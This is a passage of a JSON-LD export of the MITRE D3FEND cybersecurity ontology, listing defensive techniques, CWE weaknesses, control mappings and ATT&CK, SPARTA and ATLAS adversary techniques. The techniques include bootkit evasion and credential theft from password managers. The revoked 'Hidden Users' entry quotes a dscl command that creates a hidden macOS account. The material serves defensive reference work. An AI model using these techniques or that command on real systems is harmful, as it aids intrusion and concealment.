application protocol based on traffic content.\n* Business requirements typically drive the development of filtering rule sets.\n\n## Implementations\n- iptables (Linux)\n- Windows Firewall\n- pf (BSD)",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-AutomaticallyGeneratingRulesForConnectionSecurity_Microsoft"
      },
      "rdfs:label": "Outbound Traffic Filtering",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficFiltering"
        },
        {
          "@id": "_:Na08dcb0fd7164e109e5ca499ddbdcf2a"
        }
      ]
    },
    {
      "@id": "_:Na08dcb0fd7164e109e5ca499ddbdcf2a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundNetworkTraffic"
      }
    },
    {
      "@id": "d3f:ImageCodeSegment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Subroutine"
      },
      "d3f:definition": "An image code segment, also known as a text segment or simply as text, is a portion of an object file that contains executable instructions. The term \"segment\" comes from the memory segment, which is a historical approach to memory management that has been succeeded by paging. When a program is stored in an object file, the code segment is a part of this file; when the loader places a program into memory so that it may be executed, various memory regions are allocated (in particular, as pages), corresponding to both the segments in the object files and to segments only needed at run time. For example, the code segment of an object file is loaded into a corresponding code segment in memory.",
      "rdfs:label": "Image Code Segment",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ProcessCodeSegment"
        },
        {
          "@id": "dbr:Code_segment"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ImageSegment"
        },
        {
          "@id": "_:N03a2908125fd4de7a40a69c7a9d8aa2c"
        }
      ]
    },
    {
      "@id": "_:N03a2908125fd4de7a40a69c7a9d8aa2c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:DS0004",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Information obtained (via shared or submitted samples) regarding malicious software (droppers, backdoors, etc.) used by adversaries",
      "d3f:narrower": [
        {
          "@id": "d3f:FileHash"
        },
        {
          "@id": "d3f:ImageCodeSegment"
        }
      ],
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Scheduled Job Metadata component",
      "rdfs:label": "Malware Repository (ATT&CK DS)"
    },
    {
      "@id": "d3f:CWE-786",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-786",
      "d3f:definition": "The product reads or writes to a buffer using an index or pointer that references a memory location prior to the beginning of the buffer.",
      "rdfs:label": "Access of Memory Location Before Start of Buffer",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-119"
      }
    },
    {
      "@id": "d3f:CWE-220",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-220",
      "d3f:definition": "The product stores sensitive data under the FTP server root with insufficient access control, which might make it accessible to untrusted parties.",
      "rdfs:label": "Storage of File With Sensitive Data Under FTP Root",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-552"
      }
    },
    {
      "@id": "d3f:DE-0008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0008",
      "d3f:definition": "A bootkit hides activity by running first and shaping what higher layers will later observe. Positioned in boot ROM handoff or early loaders, it can select or patch images in memory, alter device trees and driver tables, seed forged counters and timestamps, and preconfigure telemetry/crypto modes so subsequent components launch into a reality curated by the attacker. Because integrity and logging mechanisms are initialized afterward, the resulting view of processes, files, and histories reflects the bootkit’s choices, allowing long-term evasion that persists across resets and mode transitions.",
      "d3f:modifies": {
        "@id": "d3f:BootLoader"
      },
      "rdfs:label": "Evasion via Bootkit - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0008/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTADefenseEvasionTechnique"
        },
        {
          "@id": "_:N93ba8ca061da404aa21cd1020371afa4"
        }
      ],
      "skos:prefLabel": "Evasion via Bootkit"
    },
    {
      "@id": "_:N93ba8ca061da404aa21cd1020371afa4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootLoader"
      }
    },
    {
      "@id": "d3f:T1159",
      "@type": "owl:Class",
      "d3f:attack-id": "T1159",
      "d3f:definition": "Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>$HOME/Library/LaunchAgents</code> (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1543.001",
      "rdfs:label": "Launch Agent",
      "rdfs:seeAlso": {
        "@id": "d3f:T1543.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:T1032",
      "@type": "owl:Class",
      "d3f:attack-id": "T1032",
      "d3f:definition": "Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1573",
      "rdfs:label": "Standard Cryptographic Protocol",
      "rdfs:seeAlso": {
        "@id": "d3f:T1573"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:T1615",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1615",
      "d3f:definition": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)",
      "d3f:reads": {
        "@id": "d3f:GroupPolicy"
      },
      "rdfs:label": "Group Policy Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N70f46a51672246b881fbf3d30aa59f10"
        }
      ]
    },
    {
      "@id": "_:N70f46a51672246b881fbf3d30aa59f10",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GroupPolicy"
      }
    },
    {
      "@id": "d3f:addresses",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x addresses y: Relates a pointer x to a digital artifact y located in the address space to which x points. The address space is part of some digital store, whether it be in memory, an image, or a persistent storage device.",
      "rdfs:label": "addresses",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Pointer_(computer_programming)"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/02253826-v"
        }
      ],
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      },
      "skos:altLabel": "points-to"
    },
    {
      "@id": "d3f:CWE-317",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-317",
      "d3f:definition": "The product stores sensitive information in cleartext within the GUI.",
      "rdfs:label": "Cleartext Storage of Sensitive Information in GUI",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-312"
      }
    },
    {
      "@id": "d3f:Moments",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MOM",
      "d3f:definition": "With a probability distribution function, the the first moment is the expected value, the second central moment is the variance, the third standardized moment is the skewness, and the fourth standardized moment is the kurtosis.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Moment (mathematics). [Link](https://en.wikipedia.org/wiki/Moment_(mathematics))",
      "rdfs:label": "Moments",
      "rdfs:subClassOf": {
        "@id": "d3f:DistributionProperties"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-3_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Maintenance Tools | Prevent Unauthorized Removal",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "rdfs:label": "MA-3(3)"
    },
    {
      "@id": "d3f:TimeInterval",
      "@type": "owl:Class",
      "d3f:definition": "A time interval is a one-dimensional temporal region that has duration and represents a continuous extent of time bounded by two time instants (a start instant and an end instant).",
      "rdfs:label": "Time Interval",
      "rdfs:subClassOf": {
        "@id": "d3f:Time"
      }
    },
    {
      "@id": "d3f:enforces",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x enforces y: Technique x forces entity y to be compliant with a law, rule, or obligation.",
      "rdfs:label": "enforces",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-1193",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1193",
      "d3f:definition": "The product enables components that contain untrusted firmware before memory and fabric access controls have been enabled.",
      "rdfs:label": "Power-On of Untrusted Execution Core Before Enabling Fabric Access Control",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-696"
      }
    },
    {
      "@id": "d3f:Reference-ComputerWormDefenseSystemAndMethod_FireEyeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20130036472A1"
      },
      "d3f:kb-abstract": "\"A computer worm defense system comprises multiple containment systems tied together by a management system. Each containment system is deployed on a separate communication network and contains a worm sensor and a blocking system. In various embodiments, the computer worm may be transported from a production network, where the computer worm is not readily identifiable, to an alternate network in the worm sensor where the computer worm may be readily identifiable. Computer worm identifiers generated by a worm sensor of one containment system can be provided not only to the blocking system of the same containment system, but can also be distributed by the management system to blocking systems of other containment systems.\"",
      "d3f:kb-author": "Ashar Aziz",
      "d3f:kb-mitre-analysis": "This patent describes network data being copied by a tap and then analyzed in an analysis environment to determine whether the network data is suspicious using a heuristic module. The analysis environment replays transmission of the suspicious network data between a configured replayer and a virtual machine to detect unauthorized activity.",
      "d3f:kb-organization": "FireEye Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileCarving"
      },
      "d3f:kb-reference-title": "Computer Worm Defense System and Method",
      "rdfs:label": "Reference - Computer Worm Defense System and Method - FireEye Inc"
    },
    {
      "@id": "d3f:FileAccessPatternAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileAccessPatternAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:LocalResourceAccess"
      },
      "d3f:d3fend-id": "D3-FAPA",
      "d3f:definition": "Analyzing the files accessed by a process to identify unauthorized activity.",
      "d3f:kb-article": "## How it works\nFile modifying malware such as wipers and ransomware are detected by identifying file access patterns that are associated with a malicious process. Examples of file access patterns include accessing a large number of files, accessing multiple file types, files being accessed located in multiple locations in a directory, and copying a file and encrypting the contents of that file into a copy.\n\n## Considerations\nCertain file access actions may not be statistically different from authorized activity.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-File-modifyingMalwareDetection_CrowdstrikeInc"
      },
      "rdfs:label": "File Access Pattern Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "_:N64c1628091cf475fb397bf64987a2816"
        }
      ]
    },
    {
      "@id": "_:N64c1628091cf475fb397bf64987a2816",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalResourceAccess"
      }
    },
    {
      "@id": "d3f:CWE-305",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-305",
      "d3f:definition": "The authentication algorithm is sound, but the implemented mechanism can be bypassed as the result of a separate weakness that is primary to the authentication error.",
      "rdfs:label": "Authentication Bypass by Primary Weakness",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:UserAccountEnableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a user account is enabled, granting it active use within the system.",
      "rdfs:label": "User Account Enable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:N48743198694242438a9139793a352542"
        }
      ]
    },
    {
      "@id": "_:N48743198694242438a9139793a352542",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:ProximitySensorMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProximitySensorMonitoring"
      ],
      "d3f:d3fend-id": "D3-PSM",
      "d3f:definition": "Monitoring events from proximity sensors that indicate a credential or tagged asset is within the sensor’s read range or a defined zone. Common enabling technologies include RFID, Bluetooth Low Energy (BLE), and Ultra-Wideband (UWB).",
      "d3f:kb-article": "## How it works\n\nProximity readers and sensors detect credentials or tagged assets within their read field, then report presence and, when applicable, authenticate to a controller for access decisions. Systems may use RSSI, dwell time, or time-of-flight to enforce zones and policies such as anti-passback. Secure, authenticated communication between readers and controllers helps prevent cloning and replay attacks.\n\n## Considerations\n\n * Place readers and align antennas to achieve consistent read ranges; account for materials like metal and liquids that can detune signals.\n* Use cryptographic credentials with mutual authentication and encrypted, supervised reader links to mitigate cloning and relay attacks.\n* Protect privacy by minimizing collected data, limiting retention, and restricting access to proximity logs.\n* Calibrate detection thresholds and zone boundaries; re-test after layout changes or equipment moves.\n* Monitor reader and tag health, including battery status for BLE and UWB tags and supervision signals for wired and wireless devices.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FIPS-201-3"
        },
        {
          "@id": "d3f:Reference-NIST-SP800-116r1"
        },
        {
          "@id": "d3f:Reference-Wikipedia-ProximityCard"
        },
        {
          "@id": "d3f:Reference-Wikipedia-RFID"
        }
      ],
      "d3f:monitors": {
        "@id": "d3f:ProximitySensor"
      },
      "d3f:synonym": [
        "Proximity Reader Monitoring",
        "RFID Reader Monitoring"
      ],
      "rdfs:label": "Proximity Sensor Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalAccessMonitoring"
        },
        {
          "@id": "_:N04a664c391894477bdd0ed23be42b52e"
        }
      ]
    },
    {
      "@id": "_:N04a664c391894477bdd0ed23be42b52e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProximitySensor"
      }
    },
    {
      "@id": "d3f:CWE-416",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-416",
      "d3f:definition": "The product reuses or references memory after it has been freed. At some point afterward, the memory may be allocated again and saved in another pointer, while the original pointer references a location somewhere within the new allocation. Any operations using the original pointer are no longer valid because the memory \"belongs\" to the code that operates on the new pointer.",
      "d3f:synonym": [
        "Dangling pointer",
        "UAF",
        "Use-After-Free"
      ],
      "rdfs:label": "Use After Free",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-825"
      }
    },
    {
      "@id": "d3f:cwe-id",
      "@type": "owl:AnnotationProperty",
      "rdfs:label": "cwe-id",
      "rdfs:subPropertyOf": {
        "@id": "d3f:cwe-kb-annotation"
      }
    },
    {
      "@id": "d3f:kb-mitre-analysis",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x kb-mitre-analysis y: The reference x has the mitre d3fend analysis y.",
      "rdfs:domain": {
        "@id": "d3f:TechniqueReference"
      },
      "rdfs:label": "kb-mitre-analysis",
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-annotation-property"
      }
    },
    {
      "@id": "d3f:LocalAuthorizationService",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:authorizes": {
        "@id": "d3f:LocalUserAccount"
      },
      "d3f:definition": "A local authorization service running on a host can authorize a user logged into just that local host computer.",
      "rdfs:label": "Local Authorization Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AuthorizationService"
        },
        {
          "@id": "_:N332e1788ef5943a484accfdb56f34840"
        }
      ]
    },
    {
      "@id": "_:N332e1788ef5943a484accfdb56f34840",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authorizes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalUserAccount"
      }
    },
    {
      "@id": "d3f:AML.T0012",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0012",
      "d3f:definition": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access.\nCredentials may take the form of usernames and passwords of individual user accounts or API keys that provide access to various AI resources and services.\n\nCompromised credentials may provide access to additional AI artifacts and allow the adversary to perform [Discover AI Artifacts](/techniques/AML.T0007).\nCompromised credentials may also grant an adversary increased privileges such as write access to AI artifacts used during development or production.",
      "rdfs:label": "Valid Accounts - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0012"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASInitialAccessTechnique"
      },
      "skos:prefLabel": "Valid Accounts"
    },
    {
      "@id": "d3f:OTCreateNewControlProgramCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a remote device to create an control program.",
      "d3f:has-participant": {
        "@id": "d3f:OTControlProgram"
      },
      "rdfs:comment": "GE-SRTP: WRITE PROGRAM BLOCK MEMORY\nGE-SRTP: SET CONTROL ID(CPU ID)\nGE-SRTP: PROGRAM LOAD (DOWNLOAD TO PLC)\nGE-SRTP: TOGGLE FORCE SYSTEM MEMORY",
      "rdfs:label": "OT Create New Control Program Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyControlProgramCommand"
        },
        {
          "@id": "_:N9e04f27d8b124ebab5d8adef59d1b415"
        }
      ]
    },
    {
      "@id": "_:N9e04f27d8b124ebab5d8adef59d1b415",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "d3f:T1555.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1555.005",
      "d3f:definition": "Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)",
      "rdfs:label": "Password Managers",
      "rdfs:subClassOf": {
        "@id": "d3f:T1555"
      }
    },
    {
      "@id": "d3f:Reference-Wikipedia-RFID",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://en.wikipedia.org/wiki/RFID"
      },
      "d3f:kb-abstract": "General overview of radio-frequency identification systems, tags, readers, and security considerations.",
      "d3f:kb-author": "Wikipedia contributors",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProximitySensorMonitoring"
      },
      "d3f:kb-reference-title": "RFID",
      "rdfs:label": "Reference - Wikipedia: RFID"
    },
    {
      "@id": "d3f:CCI-002205_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uniquely identifies and authenticates source by organization, system, application, and/or individual for information transfer.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002205"
    },
    {
      "@id": "d3f:Reference-ComputingApparatusWithAutomaticIntegrityReferenceGenerationAndMaintenance_Tripwire,Inc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20040060046A1"
      },
      "d3f:kb-abstract": "An apparatus is equipped to automatically update one or more integrity references of a software entity, when the software entity is installed onto the apparatus. The apparatus is further equipped to periodically determine whether the integrity of the apparatus has been compromised based at least in part on the one or more integrity references of the software entity that are automatically updated during installation of the software entity.",
      "d3f:kb-author": "Thomas Good, Robert DiFalco, Gene Kim",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Tripwire, Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:ExecutableAllowlisting"
      },
      "d3f:kb-reference-title": "Computing apparatus with automatic integrity reference generation and maintenance",
      "rdfs:label": "Reference - Computing apparatus with automatic integrity reference generation and maintenance - Tripwire, Inc."
    },
    {
      "@id": "d3f:AML.T0073",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0073",
      "d3f:definition": "Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing](/techniques/AML.T0052), or [Spearphishing via Social Engineering LLM](/techniques/AML.T0052.000)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary's ultimate goals, possibly against multiple victims.\n\nAdversaries may target resources that are part of the AI DevOps lifecycle, such as model repositories, container registries, and software registries.",
      "rdfs:label": "Impersonation - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0073"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Impersonation"
    },
    {
      "@id": "d3f:TestExecutionTool",
      "@type": "owl:Class",
      "d3f:definition": "A test execution tool is a type of software used to test software, hardware or complete systems.  Synonyms of test execution tool include test execution engine, test executive, test manager, test sequencer.  Two common forms in which a test execution engine may appear are as a: (a) module of a test software suite (test bench) or an integrated development environment, or (b) stand-alone application software.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Test_execution_engine"
      },
      "rdfs:label": "Test Execution Tool",
      "rdfs:subClassOf": {
        "@id": "d3f:DeveloperApplication"
      },
      "skos:altLabel": [
        "Test Execution Engine",
        "Test Executive",
        "Test Manager"
      ]
    },
    {
      "@id": "d3f:CWE-449",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-449",
      "d3f:definition": "The UI performs the wrong action with respect to the user's request.",
      "rdfs:label": "The UI Performs the Wrong Action",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-446"
      }
    },
    {
      "@id": "d3f:T1599",
      "@type": "owl:Class",
      "d3f:attack-id": "T1599",
      "d3f:definition": "Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.",
      "rdfs:label": "Network Boundary Bridging",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1612",
      "@type": "owl:Class",
      "d3f:attack-id": "T1612",
      "d3f:definition": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)",
      "rdfs:label": "Build Image on Host",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:CCI-001082_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system separates user functionality (including user interface services) from information system management functionality.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001082"
    },
    {
      "@id": "d3f:CyberAction",
      "@type": "owl:Class",
      "rdfs:label": "Cyber Action",
      "rdfs:subClassOf": {
        "@id": "d3f:Action"
      }
    },
    {
      "@id": "d3f:CCI-001557_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:NetworkTrafficAnalysis"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system tracks problems associated with the information transfer.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-11T00:00:00"
      },
      "rdfs:label": "CCI-001557"
    },
    {
      "@id": "d3f:SPARTAExecutionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0004"
      },
      "rdfs:label": "Execution Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:N54892dbe86f444009ccc73fd9ddf8ef6"
        }
      ],
      "skos:prefLabel": "Execution Technique"
    },
    {
      "@id": "_:N54892dbe86f444009ccc73fd9ddf8ef6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0004"
      }
    },
    {
      "@id": "d3f:T1548",
      "@type": "owl:Class",
      "d3f:attack-id": "T1548",
      "d3f:definition": "Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)",
      "rdfs:label": "Abuse Elevation Control Mechanism",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-573",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-573",
      "d3f:definition": "The product does not follow or incorrectly follows the specifications as required by the implementation language, environment, framework, protocol, or platform.",
      "rdfs:label": "Improper Following of Specification by Caller",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CWE-148",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-148",
      "d3f:definition": "The product does not properly handle when a leading character or sequence (\"leader\") is missing or malformed, or if multiple leaders are used when only one should be allowed.",
      "rdfs:label": "Improper Neutralization of Input Leaders",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:T1147",
      "@type": "owl:Class",
      "d3f:attack-id": "T1147",
      "d3f:definition": "Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in <code>/Library/Preferences/com.apple.loginwindow</code> called <code>Hide500Users</code> that prevents users with userIDs 500 and lower from appearing at the login screen. By using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: <code>sudo dscl . -create /Users/username UniqueID 401</code> (Citation: Cybereason OSX Pirrit).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1564.002",
      "rdfs:label": "Hidden Users",
      "rdfs:seeAlso": {
        "@id": "d3f:T1564.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:UserAction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An action performed by a user. Executing commands, granting permissions, and accessing resources are examples of user actions.",
      "d3f:records": {
        "@id": "d3f:Action"
      },
      "rdfs:label": "User Action",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N8deb014e499343eea2316c51f55ed7eb"
        }
      ]
    },
    {
      "@id": "_:N8deb014e499343eea2316c51f55ed7eb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:records"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Action"
      }
    },
    {
      "@id": "d3f:CCI-002423_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to protect message externals (e.g., message headers and routing information) unless otherwise protected by organization-defined alternative physical safeguards.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:EncryptedTunnels"
      },
